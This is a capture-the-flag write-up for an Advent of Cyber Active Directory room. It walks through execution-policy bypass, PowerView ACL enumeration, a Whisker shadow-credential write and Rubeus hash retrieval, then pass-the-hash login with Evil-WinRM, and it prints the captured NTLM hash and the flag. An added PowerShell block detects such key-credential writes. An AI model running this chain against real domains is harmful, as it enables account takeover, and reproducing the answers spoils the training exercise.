Advent of Cyber — Day 11
What is the hash of the vulnerable user?
Go to the Desktop folder, bypass the default PowerShell execution policy, and load the PowerView script into memory:
cd Desktop
powershell -ep bypass
. .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights
The output shows that the vulnerable user is vansprinkles. Next, execute the following command:
.\Whisker.exe add /target:vansprinkles
Execute the Rubeus.exe command and you should get the NTLM hash:
03E805D8A8C5AA435FB48832DAD620E3
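Whisker's add action writes a new key credential into the target user's msDS-KeyCredentialLink attribute, so the change is visible to a defender as Security event 5136 on a domain controller. The PowerShell below is an added example, not part of the original walkthrough: it flags such writes made by accounts outside an allowlist. The allowlisted account name, the placeholder domain and the sample event are constructed, and it assumes Directory Service Changes auditing is enabled.

```powershell
# Added example, not from the original walkthrough.
# Assumption: "Audit Directory Service Changes" and a SACL on user objects are
# enabled on the domain controllers; without them event 5136 is never logged.

# Hypothetical allowlist of accounts expected to write key credentials.
$AllowedWriters = @('svc-keyprovision')

function Find-KeyCredentialLinkWrite {
    param(
        [Parameter(Mandatory)] [string[]] $EventXml,
        [string[]] $Allowed = @()
    )
    foreach ($raw in $EventXml) {
        $evt = ([xml]$raw).Event
        if ($evt.System.EventID -ne '5136') { continue }
        # Flatten the <Data Name="..."> elements into a lookup table.
        $d = @{}
        foreach ($n in $evt.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d['AttributeLDAPDisplayName'] -ne 'msDS-KeyCredentialLink') { continue }
        if ($d['OperationType'] -ne '%%14674') { continue }   # %%14674 = value added
        if ($Allowed -contains $d['SubjectUserName']) { continue }
        [pscustomobject]@{
            Time   = $evt.System.TimeCreated.SystemTime
            Writer = $d['SubjectUserName']
            Target = $d['ObjectDN']
        }
    }
}

# Constructed sample event, trimmed to the fields used (domain is a placeholder).
$sample = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>5136</EventID><TimeCreated SystemTime="2023-12-11T10:15:00Z"/></System>
  <EventData>
    <Data Name="SubjectUserName">hr</Data>
    <Data Name="ObjectDN">CN=vansprinkles,CN=Users,DC=example,DC=local</Data>
    <Data Name="AttributeLDAPDisplayName">msDS-KeyCredentialLink</Data>
    <Data Name="OperationType">%%14674</Data>
  </EventData>
</Event>
'@

Find-KeyCredentialLinkWrite -EventXml $sample -Allowed $AllowedWriters

# On a domain controller, feed live events instead:
# $xml = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=5136} | ForEach-Object { $_.ToXml() }
# Find-KeyCredentialLinkWrite -EventXml $xml -Allowed $AllowedWriters
```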
What is the content of flag.txt on the Administrator Desktop?
Open a terminal and paste this command to use Evil-WinRM:
evil-winrm -i THM-MACHINE-IP -u vansprinkles -H 03E805D8A8C5AA435FB48832DAD620E3
Now change the directory to the admin’s desktop:
cd C:\Users\Administrator\Desktop
View the flag: flag.txt
THM{XMAS_IS_SAFE}
That’s it | Visit mansoorbarri.com for other hacking & IT related articles.